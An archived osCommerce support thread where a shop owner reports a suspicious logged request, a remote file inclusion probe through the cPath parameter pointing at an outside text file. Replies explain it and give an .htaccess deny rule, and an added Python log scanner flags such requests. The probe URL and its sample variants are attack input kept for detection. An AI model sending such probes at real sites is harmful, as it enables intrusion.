Online Customers


katman1971


Hi

 

I just went in to Customers online and I have a much greater amount of visitors than normal. I noticed one strange visitor in particular and the url they are visiting is this, which is very strange:

index.php?cpath=http://www.soloencostarica.com/scripts/id.txt??? ?

 

My site is www.homelandart.ie but this is definitely not one of my URLs. When you visit this URL, you see my site though. Is someone trying something strange? Thanks


Yes, that's a hack attempt. I've had the same problem. If your store is running osCommerce 2.2RC1 or later the attacks will not succeed. However they will eat up bandwidth and database connections, which could prevent legitimate customers from seeing your site. You can check by viewing random pages yourself. If you don't get any database errors you are probably fine. If you do see errors, or you want to block the hack, you will need to make a change to your .htaccess file.

 

To block the hacker, first make certain that your .htaccess has the following lines:

Options +FollowSymLinks
RewriteEngine on

If that code is not already there, add it to the bottom of the file. Then add the following after that:

# Block hackers trying a redirect in the URL
RewriteCond %{QUERY_STRING} ^(.*)cPath=http://(.*)$ [NC]
RewriteRule ^.* - [F]

 

Regards

Jim

See my profile for a list of my addons and ways to get support.
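Added example, not part of Jim's post or of osCommerce: a log check that finds the kind of request shown in this thread, generalized from `cPath=http://` to any query parameter whose decoded value is a remote URL (`http`, `https` or `ftp`). It assumes Apache combined-format access logs; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Constructed Apache combined-format log lines. Client IPs are documentation
# addresses; the first request carries the query string quoted in this thread.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2008:10:01:02 +0000] "GET /index.php?cpath=http://www.soloencostarica.com/scripts/id.txt??? HTTP/1.1" 200 5120 "-" "-"
198.51.100.20 - - [01/Jan/2008:10:01:05 +0000] "GET /index.php?cPath=1_4&sort=2a HTTP/1.1" 200 20480 "-" "-"
203.0.113.7 - - [01/Jan/2008:10:01:09 +0000] "GET /product_info.php?products_id=https%3A%2F%2Fexample.invalid%2Fid.txt%3F HTTP/1.1" 200 5120 "-" "-"
198.51.100.20 - - [01/Jan/2008:10:02:11 +0000] "GET /redirect.php?action=url&goto=www.example.invalid HTTP/1.1" 302 0 "-" "-"
"""

# Client IP, then the request target inside the quoted request line.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "\S+ (\S+)[^"]*"')
# A parameter value that is itself a remote URL.
REMOTE_URL = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)


def find_probes(log_text):
    """Return (client_ip, parameter, decoded_value) for each suspicious parameter."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, target = m.groups()
        query = target.partition("?")[2]
        # parse_qsl percent-decodes, so an encoded "http%3A%2F%2F" is caught too.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_URL.match(value):
                hits.append((ip, name, value))
    return hits


def probes_by_client(hits):
    """Count flagged parameters per client IP, to show who is sending the probes."""
    counts = {}
    for ip, _name, _value in hits:
        counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == "__main__":
    for hit in find_probes(SAMPLE_LOG):
        print(*hit)
    print(probes_by_client(find_probes(SAMPLE_LOG)))
```

Normal category links such as `cPath=1_4` are not flagged, so the per-client counts reflect only requests that pass a URL where the store expects an id.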


Funny, there seems to be more and more of this. I used to see one of these hack attempts pop up in my "Who's Online" now and again, but lately I see them every few days, and there are three or four varieties. But breathe easy - they can't succeed unless you have a very old version of osC or you have installed mods that open up vulnerabilities.

 

~Wendy


Dang hackers anyway!

:angry:

 

A very wise man once said, "The love of money is the root of all evil".

 

No matter where you call home or what religion you are (or aren't), you'd probably agree with that.

 

Dang hackers!

:angry:

 

May the fleas of 1,000 camels find their way into their beds!

 

May they mistake the hemorrhoid creme for toothpaste some groggy morning!

:o

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >


Archived

This topic is now archived and is closed to further replies.
